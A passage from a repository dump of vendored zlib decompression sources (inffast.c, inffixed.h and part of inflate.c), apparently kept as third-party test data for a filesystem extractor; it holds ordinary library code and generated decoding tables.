DROPBITS(here.bits); if (here.op & 64) { strm->msg = (char *)"invalid distance code"; state->mode = BAD; break; } state->offset = (unsigned)here.val; /* get distance extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->offset += BITS(state->extra); DROPBITS(state->extra); } if (state->offset > state->wsize - (state->whave < state->wsize ? left : 0)) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } Tracevv((stderr, "inflate: distance %u\n", state->offset)); /* copy match from window to output */ do { ROOM(); copy = state->wsize - state->offset; if (copy < left) { from = put + copy; copy = left - copy; } else { from = put - state->offset; copy = left; } if (copy > state->length) copy = state->length; state->length -= copy; left -= copy; do { *put++ = *from++; } while (--copy); } while (state->length != 0); break; case DONE: /* inflate stream terminated properly */ ret = Z_STREAM_END; goto inf_leave; case BAD: ret = Z_DATA_ERROR; goto inf_leave; default: /* can't happen, but makes compilers happy */ ret = Z_STREAM_ERROR; goto inf_leave; } /* Write leftover output and return unused input */ inf_leave: if (left < state->wsize) { if (out(out_desc, state->window, state->wsize - left) && ret == Z_STREAM_END) ret = Z_BUF_ERROR; } strm->next_in = next; strm->avail_in = have; return ret; } int ZEXPORT inflateBackEnd(z_streamp strm) { if (strm == Z_NULL || strm->state == Z_NULL || strm->zfree == (free_func)0) return Z_STREAM_ERROR; ZFREE(strm, strm->state); strm->state = Z_NULL; Tracev((stderr, "inflate: end\n")); return Z_OK; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffast.c ================================================ /* inffast.c -- fast decoding * Copyright (C) 1995-2017 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "zutil.h" #include "inftrees.h" #include "inflate.h" #include "inffast.h" #ifdef ASMINF # pragma message("Assembler code may have bugs -- use at your own risk") #else /* Decode literal, length, and distance codes and write out the resulting literal and match bytes until either not enough input or output is available, an end-of-block is encountered, or a data error is encountered. When large enough input and output buffers are supplied to inflate(), for example, a 16K input buffer and a 64K output buffer, more than 95% of the inflate execution time is spent in this routine. Entry assumptions: state->mode == LEN strm->avail_in >= 6 strm->avail_out >= 258 start >= strm->avail_out state->bits < 8 On return, state->mode is one of: LEN -- ran out of enough output space or enough available input TYPE -- reached end of block code, inflate() to interpret next block BAD -- error in block data Notes: - The maximum input bits used by a length/distance pair is 15 bits for the length code, 5 bits for the length extra, 15 bits for the distance code, and 13 bits for the distance extra. This totals 48 bits, or six bytes. Therefore if strm->avail_in >= 6, then there is enough input to avoid checking for available input while decoding. - The maximum bytes that a single length/distance pair can output is 258 bytes, which is the maximum length that can be coded. inflate_fast() requires strm->avail_out >= 258 for each loop to avoid checking for output space. */ void ZLIB_INTERNAL inflate_fast(z_streamp strm, unsigned start) { struct inflate_state FAR *state; z_const unsigned char FAR *in; /* local strm->next_in */ z_const unsigned char FAR *last; /* have enough input while in < last */ unsigned char FAR *out; /* local strm->next_out */ unsigned char FAR *beg; /* inflate()'s initial strm->next_out */ unsigned char FAR *end; /* while out < end, enough space available */ #ifdef INFLATE_STRICT unsigned dmax; /* maximum distance from zlib header */ #endif unsigned wsize; /* window size or zero if not using window */ unsigned whave; /* valid bytes in the window */ unsigned wnext; /* window write index */ unsigned char FAR *window; /* allocated sliding window, if wsize != 0 */ unsigned long hold; /* local strm->hold */ unsigned bits; /* local strm->bits */ code const FAR *lcode; /* local strm->lencode */ code const FAR *dcode; /* local strm->distcode */ unsigned lmask; /* mask for first level of length codes */ unsigned dmask; /* mask for first level of distance codes */ code const *here; /* retrieved table entry */ unsigned op; /* code bits, operation, extra bits, or */ /* window position, window bytes to copy */ unsigned len; /* match length, unused bytes */ unsigned dist; /* match distance */ unsigned char FAR *from; /* where to copy match from */ /* copy state to local variables */ state = (struct inflate_state FAR *)strm->state; in = strm->next_in; last = in + (strm->avail_in - 5); out = strm->next_out; beg = out - (start - strm->avail_out); end = out + (strm->avail_out - 257); #ifdef INFLATE_STRICT dmax = state->dmax; #endif wsize = state->wsize; whave = state->whave; wnext = state->wnext; window = state->window; hold = state->hold; bits = state->bits; lcode = state->lencode; dcode = state->distcode; lmask = (1U << state->lenbits) - 1; dmask = (1U << state->distbits) - 1; /* decode literals and length/distances until end-of-block or not enough input data or output space */ do { if (bits < 15) { hold += (unsigned long)(*in++) << bits; bits += 8; hold += (unsigned long)(*in++) << bits; bits += 8; } here = lcode + (hold & lmask); dolen: op = (unsigned)(here->bits); hold >>= op; bits -= op; op = (unsigned)(here->op); if (op == 0) { /* literal */ Tracevv((stderr, here->val >= 0x20 && here->val < 0x7f ? "inflate: literal '%c'\n" : "inflate: literal 0x%02x\n", here->val)); *out++ = (unsigned char)(here->val); } else if (op & 16) { /* length base */ len = (unsigned)(here->val); op &= 15; /* number of extra bits */ if (op) { if (bits < op) { hold += (unsigned long)(*in++) << bits; bits += 8; } len += (unsigned)hold & ((1U << op) - 1); hold >>= op; bits -= op; } Tracevv((stderr, "inflate: length %u\n", len)); if (bits < 15) { hold += (unsigned long)(*in++) << bits; bits += 8; hold += (unsigned long)(*in++) << bits; bits += 8; } here = dcode + (hold & dmask); dodist: op = (unsigned)(here->bits); hold >>= op; bits -= op; op = (unsigned)(here->op); if (op & 16) { /* distance base */ dist = (unsigned)(here->val); op &= 15; /* number of extra bits */ if (bits < op) { hold += (unsigned long)(*in++) << bits; bits += 8; if (bits < op) { hold += (unsigned long)(*in++) << bits; bits += 8; } } dist += (unsigned)hold & ((1U << op) - 1); #ifdef INFLATE_STRICT if (dist > dmax) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } #endif hold >>= op; bits -= op; Tracevv((stderr, "inflate: distance %u\n", dist)); op = (unsigned)(out - beg); /* max distance in output */ if (dist > op) { /* see if copy from window */ op = dist - op; /* distance back in window */ if (op > whave) { if (state->sane) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } #ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR if (len <= op - whave) { do { *out++ = 0; } while (--len); continue; } len -= op - whave; do { *out++ = 0; } while (--op > whave); if (op == 0) { from = out - dist; do { *out++ = *from++; } while (--len); continue; } #endif } from = window; if (wnext == 0) { /* very common case */ from += wsize - op; if (op < len) { /* some from window */ len -= op; do { *out++ = *from++; } while (--op); from = out - dist; /* rest from output */ } } else if (wnext < op) { /* wrap around window */ from += wsize + wnext - op; op -= wnext; if (op < len) { /* some from end of window */ len -= op; do { *out++ = *from++; } while (--op); from = window; if (wnext < len) { /* some from start of window */ op = wnext; len -= op; do { *out++ = *from++; } while (--op); from = out - dist; /* rest from output */ } } } else { /* contiguous in window */ from += wnext - op; if (op < len) { /* some from window */ len -= op; do { *out++ = *from++; } while (--op); from = out - dist; /* rest from output */ } } while (len > 2) { *out++ = *from++; *out++ = *from++; *out++ = *from++; len -= 3; } if (len) { *out++ = *from++; if (len > 1) *out++ = *from++; } } else { from = out - dist; /* copy direct from output */ do { /* minimum length is three */ *out++ = *from++; *out++ = *from++; *out++ = *from++; len -= 3; } while (len > 2); if (len) { *out++ = *from++; if (len > 1) *out++ = *from++; } } } else if ((op & 64) == 0) { /* 2nd level distance code */ here = dcode + here->val + (hold & ((1U << op) - 1)); goto dodist; } else { strm->msg = (char *)"invalid distance code"; state->mode = BAD; break; } } else if ((op & 64) == 0) { /* 2nd level length code */ here = lcode + here->val + (hold & ((1U << op) - 1)); goto dolen; } else if (op & 32) { /* end-of-block */ Tracevv((stderr, "inflate: end of block\n")); state->mode = TYPE; break; } else { strm->msg = (char *)"invalid literal/length code"; state->mode = BAD; break; } } while (in < last && out < end); /* return unused bytes (on entry, bits < 8, so in won't go too far back) */ len = bits >> 3; in -= len; bits -= len << 3; hold &= (1U << bits) - 1; /* update state and return */ strm->next_in = in; strm->next_out = out; strm->avail_in = (unsigned)(in < last ? 5 + (last - in) : 5 - (in - last)); strm->avail_out = (unsigned)(out < end ? 257 + (end - out) : 257 - (out - end)); state->hold = hold; state->bits = bits; return; } /* inflate_fast() speedups that turned out slower (on a PowerPC G3 750CXe): - Using bit fields for code structure - Different op definition to avoid & for extra bits (do & for table bits) - Three separate decoding do-loops for direct, window, and wnext == 0 - Special case for distance > 1 copies to do overlapped load and store copy - Explicit branch predictions (based on measured branch probabilities) - Deferring match copy and interspersed it with decoding subsequent codes - Swapping literal/length else - Swapping window/direct else - Larger unrolled copy loops (three is about right) - Moving len -= 3 statement into middle of loop */ #endif /* !ASMINF */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffast.h ================================================ /* inffast.h -- header to use inffast.c * Copyright (C) 1995-2003, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ void ZLIB_INTERNAL inflate_fast(z_streamp strm, unsigned start); ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inffixed.h ================================================ /* inffixed.h -- table for decoding fixed codes * Generated automatically by makefixed(). */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of this library and is subject to change. Applications should only use zlib.h. */ static const code lenfix[512] = { {96,7,0},{0,8,80},{0,8,16},{20,8,115},{18,7,31},{0,8,112},{0,8,48}, {0,9,192},{16,7,10},{0,8,96},{0,8,32},{0,9,160},{0,8,0},{0,8,128}, {0,8,64},{0,9,224},{16,7,6},{0,8,88},{0,8,24},{0,9,144},{19,7,59}, {0,8,120},{0,8,56},{0,9,208},{17,7,17},{0,8,104},{0,8,40},{0,9,176}, {0,8,8},{0,8,136},{0,8,72},{0,9,240},{16,7,4},{0,8,84},{0,8,20}, {21,8,227},{19,7,43},{0,8,116},{0,8,52},{0,9,200},{17,7,13},{0,8,100}, {0,8,36},{0,9,168},{0,8,4},{0,8,132},{0,8,68},{0,9,232},{16,7,8}, {0,8,92},{0,8,28},{0,9,152},{20,7,83},{0,8,124},{0,8,60},{0,9,216}, {18,7,23},{0,8,108},{0,8,44},{0,9,184},{0,8,12},{0,8,140},{0,8,76}, {0,9,248},{16,7,3},{0,8,82},{0,8,18},{21,8,163},{19,7,35},{0,8,114}, {0,8,50},{0,9,196},{17,7,11},{0,8,98},{0,8,34},{0,9,164},{0,8,2}, {0,8,130},{0,8,66},{0,9,228},{16,7,7},{0,8,90},{0,8,26},{0,9,148}, {20,7,67},{0,8,122},{0,8,58},{0,9,212},{18,7,19},{0,8,106},{0,8,42}, {0,9,180},{0,8,10},{0,8,138},{0,8,74},{0,9,244},{16,7,5},{0,8,86}, {0,8,22},{64,8,0},{19,7,51},{0,8,118},{0,8,54},{0,9,204},{17,7,15}, {0,8,102},{0,8,38},{0,9,172},{0,8,6},{0,8,134},{0,8,70},{0,9,236}, {16,7,9},{0,8,94},{0,8,30},{0,9,156},{20,7,99},{0,8,126},{0,8,62}, {0,9,220},{18,7,27},{0,8,110},{0,8,46},{0,9,188},{0,8,14},{0,8,142}, {0,8,78},{0,9,252},{96,7,0},{0,8,81},{0,8,17},{21,8,131},{18,7,31}, {0,8,113},{0,8,49},{0,9,194},{16,7,10},{0,8,97},{0,8,33},{0,9,162}, {0,8,1},{0,8,129},{0,8,65},{0,9,226},{16,7,6},{0,8,89},{0,8,25}, {0,9,146},{19,7,59},{0,8,121},{0,8,57},{0,9,210},{17,7,17},{0,8,105}, {0,8,41},{0,9,178},{0,8,9},{0,8,137},{0,8,73},{0,9,242},{16,7,4}, {0,8,85},{0,8,21},{16,8,258},{19,7,43},{0,8,117},{0,8,53},{0,9,202}, {17,7,13},{0,8,101},{0,8,37},{0,9,170},{0,8,5},{0,8,133},{0,8,69}, {0,9,234},{16,7,8},{0,8,93},{0,8,29},{0,9,154},{20,7,83},{0,8,125}, {0,8,61},{0,9,218},{18,7,23},{0,8,109},{0,8,45},{0,9,186},{0,8,13}, {0,8,141},{0,8,77},{0,9,250},{16,7,3},{0,8,83},{0,8,19},{21,8,195}, {19,7,35},{0,8,115},{0,8,51},{0,9,198},{17,7,11},{0,8,99},{0,8,35}, {0,9,166},{0,8,3},{0,8,131},{0,8,67},{0,9,230},{16,7,7},{0,8,91}, {0,8,27},{0,9,150},{20,7,67},{0,8,123},{0,8,59},{0,9,214},{18,7,19}, {0,8,107},{0,8,43},{0,9,182},{0,8,11},{0,8,139},{0,8,75},{0,9,246}, {16,7,5},{0,8,87},{0,8,23},{64,8,0},{19,7,51},{0,8,119},{0,8,55}, {0,9,206},{17,7,15},{0,8,103},{0,8,39},{0,9,174},{0,8,7},{0,8,135}, {0,8,71},{0,9,238},{16,7,9},{0,8,95},{0,8,31},{0,9,158},{20,7,99}, {0,8,127},{0,8,63},{0,9,222},{18,7,27},{0,8,111},{0,8,47},{0,9,190}, {0,8,15},{0,8,143},{0,8,79},{0,9,254},{96,7,0},{0,8,80},{0,8,16}, {20,8,115},{18,7,31},{0,8,112},{0,8,48},{0,9,193},{16,7,10},{0,8,96}, {0,8,32},{0,9,161},{0,8,0},{0,8,128},{0,8,64},{0,9,225},{16,7,6}, {0,8,88},{0,8,24},{0,9,145},{19,7,59},{0,8,120},{0,8,56},{0,9,209}, {17,7,17},{0,8,104},{0,8,40},{0,9,177},{0,8,8},{0,8,136},{0,8,72}, {0,9,241},{16,7,4},{0,8,84},{0,8,20},{21,8,227},{19,7,43},{0,8,116}, {0,8,52},{0,9,201},{17,7,13},{0,8,100},{0,8,36},{0,9,169},{0,8,4}, {0,8,132},{0,8,68},{0,9,233},{16,7,8},{0,8,92},{0,8,28},{0,9,153}, {20,7,83},{0,8,124},{0,8,60},{0,9,217},{18,7,23},{0,8,108},{0,8,44}, {0,9,185},{0,8,12},{0,8,140},{0,8,76},{0,9,249},{16,7,3},{0,8,82}, {0,8,18},{21,8,163},{19,7,35},{0,8,114},{0,8,50},{0,9,197},{17,7,11}, {0,8,98},{0,8,34},{0,9,165},{0,8,2},{0,8,130},{0,8,66},{0,9,229}, {16,7,7},{0,8,90},{0,8,26},{0,9,149},{20,7,67},{0,8,122},{0,8,58}, {0,9,213},{18,7,19},{0,8,106},{0,8,42},{0,9,181},{0,8,10},{0,8,138}, {0,8,74},{0,9,245},{16,7,5},{0,8,86},{0,8,22},{64,8,0},{19,7,51}, {0,8,118},{0,8,54},{0,9,205},{17,7,15},{0,8,102},{0,8,38},{0,9,173}, {0,8,6},{0,8,134},{0,8,70},{0,9,237},{16,7,9},{0,8,94},{0,8,30}, {0,9,157},{20,7,99},{0,8,126},{0,8,62},{0,9,221},{18,7,27},{0,8,110}, {0,8,46},{0,9,189},{0,8,14},{0,8,142},{0,8,78},{0,9,253},{96,7,0}, {0,8,81},{0,8,17},{21,8,131},{18,7,31},{0,8,113},{0,8,49},{0,9,195}, {16,7,10},{0,8,97},{0,8,33},{0,9,163},{0,8,1},{0,8,129},{0,8,65}, {0,9,227},{16,7,6},{0,8,89},{0,8,25},{0,9,147},{19,7,59},{0,8,121}, {0,8,57},{0,9,211},{17,7,17},{0,8,105},{0,8,41},{0,9,179},{0,8,9}, {0,8,137},{0,8,73},{0,9,243},{16,7,4},{0,8,85},{0,8,21},{16,8,258}, {19,7,43},{0,8,117},{0,8,53},{0,9,203},{17,7,13},{0,8,101},{0,8,37}, {0,9,171},{0,8,5},{0,8,133},{0,8,69},{0,9,235},{16,7,8},{0,8,93}, {0,8,29},{0,9,155},{20,7,83},{0,8,125},{0,8,61},{0,9,219},{18,7,23}, {0,8,109},{0,8,45},{0,9,187},{0,8,13},{0,8,141},{0,8,77},{0,9,251}, {16,7,3},{0,8,83},{0,8,19},{21,8,195},{19,7,35},{0,8,115},{0,8,51}, {0,9,199},{17,7,11},{0,8,99},{0,8,35},{0,9,167},{0,8,3},{0,8,131}, {0,8,67},{0,9,231},{16,7,7},{0,8,91},{0,8,27},{0,9,151},{20,7,67}, {0,8,123},{0,8,59},{0,9,215},{18,7,19},{0,8,107},{0,8,43},{0,9,183}, {0,8,11},{0,8,139},{0,8,75},{0,9,247},{16,7,5},{0,8,87},{0,8,23}, {64,8,0},{19,7,51},{0,8,119},{0,8,55},{0,9,207},{17,7,15},{0,8,103}, {0,8,39},{0,9,175},{0,8,7},{0,8,135},{0,8,71},{0,9,239},{16,7,9}, {0,8,95},{0,8,31},{0,9,159},{20,7,99},{0,8,127},{0,8,63},{0,9,223}, {18,7,27},{0,8,111},{0,8,47},{0,9,191},{0,8,15},{0,8,143},{0,8,79}, {0,9,255} }; static const code distfix[32] = { {16,5,1},{23,5,257},{19,5,17},{27,5,4097},{17,5,5},{25,5,1025}, {21,5,65},{29,5,16385},{16,5,3},{24,5,513},{20,5,33},{28,5,8193}, {18,5,9},{26,5,2049},{22,5,129},{64,5,0},{16,5,2},{23,5,385}, {19,5,25},{27,5,6145},{17,5,7},{25,5,1537},{21,5,97},{29,5,24577}, {16,5,4},{24,5,769},{20,5,49},{28,5,12289},{18,5,13},{26,5,3073}, {22,5,193},{64,5,0} }; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inflate.c ================================================ /* inflate.c -- zlib decompression * Copyright (C) 1995-2022 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* * Change history: * * 1.2.beta0 24 Nov 2002 * - First version -- complete rewrite of inflate to simplify code, avoid * creation of window when not needed, minimize use of window when it is * needed, make inffast.c even faster, implement gzip decoding, and to * improve code readability and style over the previous zlib inflate code * * 1.2.beta1 25 Nov 2002 * - Use pointers for available input and output checking in inffast.c * - Remove input and output counters in inffast.c * - Change inffast.c entry and loop from avail_in >= 7 to >= 6 * - Remove unnecessary second byte pull from length extra in inffast.c * - Unroll direct copy to three copies per loop in inffast.c * * 1.2.beta2 4 Dec 2002 * - Change external routine names to reduce potential conflicts * - Correct filename to inffixed.h for fixed tables in inflate.c * - Make hbuf[] unsigned char to match parameter type in inflate.c * - Change strm->next_out[-state->offset] to *(strm->next_out - state->offset) * to avoid negation problem on Alphas (64 bit) in inflate.c * * 1.2.beta3 22 Dec 2002 * - Add comments on state->bits assertion in inffast.c * - Add comments on op field in inftrees.h * - Fix bug in reuse of allocated window after inflateReset() * - Remove bit fields--back to byte structure for speed * - Remove distance extra == 0 check in inflate_fast()--only helps for lengths * - Change post-increments to pre-increments in inflate_fast(), PPC biased? * - Add compile time option, POSTINC, to use post-increments instead (Intel?) * - Make MATCH copy in inflate() much faster for when inflate_fast() not used * - Use local copies of stream next and avail values, as well as local bit * buffer and bit count in inflate()--for speed when inflate_fast() not used * * 1.2.beta4 1 Jan 2003 * - Split ptr - 257 statements in inflate_table() to avoid compiler warnings * - Move a comment on output buffer sizes from inffast.c to inflate.c * - Add comments in inffast.c to introduce the inflate_fast() routine * - Rearrange window copies in inflate_fast() for speed and simplification * - Unroll last copy for window match in inflate_fast() * - Use local copies of window variables in inflate_fast() for speed * - Pull out common wnext == 0 case for speed in inflate_fast() * - Make op and len in inflate_fast() unsigned for consistency * - Add FAR to lcode and dcode declarations in inflate_fast() * - Simplified bad distance check in inflate_fast() * - Added inflateBackInit(), inflateBack(), and inflateBackEnd() in new * source file infback.c to provide a call-back interface to inflate for * programs like gzip and unzip -- uses window as output buffer to avoid * window copying * * 1.2.beta5 1 Jan 2003 * - Improved inflateBack() interface to allow the caller to provide initial * input in strm. * - Fixed stored blocks bug in inflateBack() * * 1.2.beta6 4 Jan 2003 * - Added comments in inffast.c on effectiveness of POSTINC * - Typecasting all around to reduce compiler warnings * - Changed loops from while (1) or do {} while (1) to for (;;), again to * make compilers happy * - Changed type of window in inflateBackInit() to unsigned char * * * 1.2.beta7 27 Jan 2003 * - Changed many types to unsigned or unsigned short to avoid warnings * - Added inflateCopy() function * * 1.2.0 9 Mar 2003 * - Changed inflateBack() interface to provide separate opaque descriptors * for the in() and out() functions * - Changed inflateBack() argument and in_func typedef to swap the length * and buffer address return values for the input function * - Check next_in and next_out for Z_NULL on entry to inflate() * * The history for versions after 1.2.0 are in ChangeLog in zlib distribution. */ #include "zutil.h" #include "inftrees.h" #include "inflate.h" #include "inffast.h" #ifdef MAKEFIXED # ifndef BUILDFIXED # define BUILDFIXED # endif #endif local int inflateStateCheck(z_streamp strm) { struct inflate_state FAR *state; if (strm == Z_NULL || strm->zalloc == (alloc_func)0 || strm->zfree == (free_func)0) return 1; state = (struct inflate_state FAR *)strm->state; if (state == Z_NULL || state->strm != strm || state->mode < HEAD || state->mode > SYNC) return 1; return 0; } int ZEXPORT inflateResetKeep(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; strm->total_in = strm->total_out = state->total = 0; strm->msg = Z_NULL; if (state->wrap) /* to support ill-conceived Java test suite */ strm->adler = state->wrap & 1; state->mode = HEAD; state->last = 0; state->havedict = 0; state->flags = -1; state->dmax = 32768U; state->head = Z_NULL; state->hold = 0; state->bits = 0; state->lencode = state->distcode = state->next = state->codes; state->sane = 1; state->back = -1; Tracev((stderr, "inflate: reset\n")); return Z_OK; } int ZEXPORT inflateReset(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; state->wsize = 0; state->whave = 0; state->wnext = 0; return inflateResetKeep(strm); } int ZEXPORT inflateReset2(z_streamp strm, int windowBits) { int wrap; struct inflate_state FAR *state; /* get the state */ if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; /* extract wrap request from windowBits parameter */ if (windowBits < 0) { if (windowBits < -15) return Z_STREAM_ERROR; wrap = 0; windowBits = -windowBits; } else { wrap = (windowBits >> 4) + 5; #ifdef GUNZIP if (windowBits < 48) windowBits &= 15; #endif } /* set number of window bits, free window if different */ if (windowBits && (windowBits < 8 || windowBits > 15)) return Z_STREAM_ERROR; if (state->window != Z_NULL && state->wbits != (unsigned)windowBits) { ZFREE(strm, state->window); state->window = Z_NULL; } /* update state and reset the rest of it */ state->wrap = wrap; state->wbits = (unsigned)windowBits; return inflateReset(strm); } int ZEXPORT inflateInit2_(z_streamp strm, int windowBits, const char *version, int stream_size) { int ret; struct inflate_state FAR *state; if (version == Z_NULL || version[0] != ZLIB_VERSION[0] || stream_size != (int)(sizeof(z_stream))) return Z_VERSION_ERROR; if (strm == Z_NULL) return Z_STREAM_ERROR; strm->msg = Z_NULL; /* in case we return an error */ if (strm->zalloc == (alloc_func)0) { #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zalloc = zcalloc; strm->opaque = (voidpf)0; #endif } if (strm->zfree == (free_func)0) #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zfree = zcfree; #endif state = (struct inflate_state FAR *) ZALLOC(strm, 1, sizeof(struct inflate_state)); if (state == Z_NULL) return Z_MEM_ERROR; Tracev((stderr, "inflate: allocated\n")); strm->state = (struct internal_state FAR *)state; state->strm = strm; state->window = Z_NULL; state->mode = HEAD; /* to pass state test in inflateReset2() */ ret = inflateReset2(strm, windowBits); if (ret != Z_OK) { ZFREE(strm, state); strm->state = Z_NULL; } return ret; } int ZEXPORT inflateInit_(z_streamp strm, const char *version, int stream_size) { return inflateInit2_(strm, DEF_WBITS, version, stream_size); } int ZEXPORT inflatePrime(z_streamp strm, int bits, int value) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; if (bits == 0) return Z_OK; state = (struct inflate_state FAR *)strm->state; if (bits < 0) { state->hold = 0; state->bits = 0; return Z_OK; } if (bits > 16 || state->bits + (uInt)bits > 32) return Z_STREAM_ERROR; value &= (1L << bits) - 1; state->hold += (unsigned)value << state->bits; state->bits += (uInt)bits; return Z_OK; } /* Return state with length and distance decoding tables and index sizes set to fixed code decoding. Normally this returns fixed tables from inffixed.h. If BUILDFIXED is defined, then instead this routine builds the tables the first time it's called, and returns those tables the first time and thereafter. This reduces the size of the code by about 2K bytes, in exchange for a little execution time. However, BUILDFIXED should not be used for threaded applications, since the rewriting of the tables and virgin may not be thread-safe. */ local void fixedtables(struct inflate_state FAR *state) { #ifdef BUILDFIXED static int virgin = 1; static code *lenfix, *distfix; static code fixed[544]; /* build fixed huffman tables if first call (may not be thread safe) */ if (virgin) { unsigned sym, bits; static code *next; /* literal/length table */ sym = 0; while (sym < 144) state->lens[sym++] = 8; while (sym < 256) state->lens[sym++] = 9; while (sym < 280) state->lens[sym++] = 7; while (sym < 288) state->lens[sym++] = 8; next = fixed; lenfix = next; bits = 9; inflate_table(LENS, state->lens, 288, &(next), &(bits), state->work); /* distance table */ sym = 0; while (sym < 32) state->lens[sym++] = 5; distfix = next; bits = 5; inflate_table(DISTS, state->lens, 32, &(next), &(bits), state->work); /* do this just once */ virgin = 0; } #else /* !BUILDFIXED */ # include "inffixed.h" #endif /* BUILDFIXED */ state->lencode = lenfix; state->lenbits = 9; state->distcode = distfix; state->distbits = 5; } #ifdef MAKEFIXED #include /* Write out the inffixed.h that is #include'd above. Defining MAKEFIXED also defines BUILDFIXED, so the tables are built on the fly. makefixed() writes those tables to stdout, which would be piped to inffixed.h. A small program can simply call makefixed to do this: void makefixed(void); int main(void) { makefixed(); return 0; } Then that can be linked with zlib built with MAKEFIXED defined and run: a.out > inffixed.h */ void makefixed(void) { unsigned low, size; struct inflate_state state; fixedtables(&state); puts(" /* inffixed.h -- table for decoding fixed codes"); puts(" * Generated automatically by makefixed()."); puts(" */"); puts(""); puts(" /* WARNING: this file should *not* be used by applications."); puts(" It is part of the implementation of this library and is"); puts(" subject to change. Applications should only use zlib.h."); puts(" */"); puts(""); size = 1U << 9; printf(" static const code lenfix[%u] = {", size); low = 0; for (;;) { if ((low % 7) == 0) printf("\n "); printf("{%u,%u,%d}", (low & 127) == 99 ? 64 : state.lencode[low].op, state.lencode[low].bits, state.lencode[low].val); if (++low == size) break; putchar(','); } puts("\n };"); size = 1U << 5; printf("\n static const code distfix[%u] = {", size); low = 0; for (;;) { if ((low % 6) == 0) printf("\n "); printf("{%u,%u,%d}", state.distcode[low].op, state.distcode[low].bits, state.distcode[low].val); if (++low == size) break; putchar(','); } puts("\n };"); } #endif /* MAKEFIXED */ /* Update the window with the last wsize (normally 32K) bytes written before returning. If window does not exist yet, create it. This is only called when a window is already in use, or when output has been written during this inflate call, but the end of the deflate stream has not been reached yet. It is also called to create a window for dictionary data when a dictionary is loaded. Providing output buffers larger than 32K to inflate() should provide a speed advantage, since only the last 32K of output is copied to the sliding window upon return from inflate(), and since all distances after the first 32K of output will fall in the output data, making match copies simpler and faster. The advantage may be dependent on the size of the processor's data caches. */ local int updatewindow(z_streamp strm, const Bytef *end, unsigned copy) { struct inflate_state FAR *state; unsigned dist; state = (struct inflate_state FAR *)strm->state; /* if it hasn't been done already, allocate space for the window */ if (state->window == Z_NULL) { state->window = (unsigned char FAR *) ZALLOC(strm, 1U << state->wbits, sizeof(unsigned char)); if (state->window == Z_NULL) return 1; } /* if window not in use yet, initialize */ if (state->wsize == 0) { state->wsize = 1U << state->wbits; state->wnext = 0; state->whave = 0; } /* copy state->wsize or less output bytes into the circular window */ if (copy >= state->wsize) { zmemcpy(state->window, end - state->wsize, state->wsize); state->wnext = 0; state->whave = state->wsize; } else { dist = state->wsize - state->wnext; if (dist > copy) dist = copy; zmemcpy(state->window + state->wnext, end - copy, dist); copy -= dist; if (copy) { zmemcpy(state->window, end - copy, copy); state->wnext = copy; state->whave = state->wsize; } else { state->wnext += dist; if (state->wnext == state->wsize) state->wnext = 0; if (state->whave < state->wsize) state->whave += dist; } } return 0; } /* Macros for inflate(): */ /* check function to use adler32() for zlib or crc32() for gzip */ #ifdef GUNZIP # define UPDATE_CHECK(check, buf, len) \ (state->flags ? crc32(check, buf, len) : adler32(check, buf, len)) #else # define UPDATE_CHECK(check, buf, len) adler32(check, buf, len) #endif /* check macros for header crc */ #ifdef GUNZIP # define CRC2(check, word) \ do { \ hbuf[0] = (unsigned char)(word); \ hbuf[1] = (unsigned char)((word) >> 8); \ check = crc32(check, hbuf, 2); \ } while (0) # define CRC4(check, word) \ do { \ hbuf[0] = (unsigned char)(word); \ hbuf[1] = (unsigned char)((word) >> 8); \ hbuf[2] = (unsigned char)((word) >> 16); \ hbuf[3] = (unsigned char)((word) >> 24); \ check = crc32(check, hbuf, 4); \ } while (0) #endif /* Load registers with state in inflate() for speed */ #define LOAD() \ do { \ put = strm->next_out; \ left = strm->avail_out; \ next = strm->next_in; \ have = strm->avail_in; \ hold = state->hold; \ bits = state->bits; \ } while (0) /* Restore state from registers in inflate() */ #define RESTORE() \ do { \ strm->next_out = put; \ strm->avail_out = left; \ strm->next_in = next; \ strm->avail_in = have; \ state->hold = hold; \ state->bits = bits; \ } while (0) /* Clear the input bit accumulator */ #define INITBITS() \ do { \ hold = 0; \ bits = 0; \ } while (0) /* Get a byte of input into the bit accumulator, or return from inflate() if there is no input available. */ #define PULLBYTE() \ do { \ if (have == 0) goto inf_leave; \ have--; \ hold += (unsigned long)(*next++) << bits; \ bits += 8; \ } while (0) /* Assure that there are at least n bits in the bit accumulator. If there is not enough available input to do that, then return from inflate(). */ #define NEEDBITS(n) \ do { \ while (bits < (unsigned)(n)) \ PULLBYTE(); \ } while (0) /* Return the low n bits of the bit accumulator (n < 16) */ #define BITS(n) \ ((unsigned)hold & ((1U << (n)) - 1)) /* Remove n bits from the bit accumulator */ #define DROPBITS(n) \ do { \ hold >>= (n); \ bits -= (unsigned)(n); \ } while (0) /* Remove zero to seven bits as needed to go to a byte boundary */ #define BYTEBITS() \ do { \ hold >>= bits & 7; \ bits -= bits & 7; \ } while (0) /* inflate() uses a state machine to process as much input data and generate as much output data as possible before returning. The state machine is structured roughly as follows: for (;;) switch (state) { ... case STATEn: if (not enough input data or output space to make progress) return; ... make progress ... state = STATEm; break; ... } so when inflate() is called again, 